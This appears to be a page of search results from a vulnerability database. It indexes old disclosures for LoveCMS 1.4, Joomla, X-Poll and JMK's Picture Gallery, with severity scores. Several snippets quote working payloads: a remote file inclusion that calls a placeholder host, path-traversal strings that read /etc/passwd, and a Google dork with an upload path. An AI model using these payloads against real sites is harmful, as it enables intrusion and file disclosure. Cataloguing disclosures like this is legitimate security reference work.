Lucene search
K

107 matches found

Packet Storm
Packet Storm
•added 2007/02/24 12:0 a.m.•24 views

lovecms14-multi.txt

rfi: /lovecms/install/index.php?step=http://site.com/boum.txt? lfi: /lovecms/install/index.php?step=/etc/passwd%00 /lovecms/?load=../../../../../../../../../../etc/passwd%00 admin upload vuln : upload any kind of file even if it's not accepted it will be stored here : /modules/content/pictures/tm...

7.4AI score
Exploits0
securityvulns
securityvulns
•added 2007/02/22 12:0 a.m.•91 views

LoveCMS 1.4 multiple vulnerabilities

rfi: /lovecms/install/index.php?step=http://site.com/boum.txt? lfi: /lovecms/install/index.php?step=/etc/passwd00 /lovecms/?load=../../../../../../../../../../etc/passwd00 admin upload vuln : upload any kind of file even if it's not accepted it will be stored here : /modules/content/pictures/tmp/...

2.2AI score
Exploits0
NVD
NVD
•added 2006/08/31 8:4 p.m.•18 views

CVE-2006-4476

Multiple unspecified vulnerabilities in Joomla! before 1.0.11, related to "Injection Flaws," allow attackers to have an unknown impact via 1 globals.php, which uses includeonce instead of require; 2 the $options variable; 3 Admin Upload Image; 4 -load; 5 content submissions when frontpage is...

7.5CVSS6.9AI score0.01318EPSS
Exploits0References4
Cvelist
Cvelist
•added 2006/08/31 8:0 p.m.•20 views

CVE-2006-4471

The Admin Upload Image functionality in Joomla! before 1.0.11 allows remote authenticated users to upload files outside of the /images/stories/ directory via unspecified vectors...

6.3AI score0.0231EPSS
Exploits0References5
CVE
CVE
•added 2006/08/31 8:0 p.m.•52 views

CVE-2006-4471

CVE-2006-4471 : In Joomla! before 1.0.11, the Admin Upload Image feature allows remote authenticated users to upload files outside the /images/stories/ directory via unspecified vectors. Affected: Joomla! prior to 1.0.11. Root cause: insufficient enforcement of directory restrictions during image...

6.5CVSS6.6AI score0.0231EPSS
Exploits0References5Affected Software1
Prion
Prion
•added 2006/05/10 2:14 a.m.•15 views

Design/Logic Flaw

X-Scripts X-Poll xpoll 2.30 allows remote attackers to execute arbitrary PHP code by using admin/images/add.php to upload a PHP file, then access it...

7.5CVSS8.2AI score0.01988EPSS
Exploits1References7Affected Software1
Packet Storm
Packet Storm
•added 2006/05/02 12:0 a.m.•23 views

JMKpicture.txt

dork: "JMK's Picture Gallery" and last path to add : admingallery.php3?action=add&upload=1 example:hhtp://www.site.com/path/.../admingallery.php3?action=add&upload=1 credits:AlpEren,tugr@...

Exploits0
Rows per page
Query Builder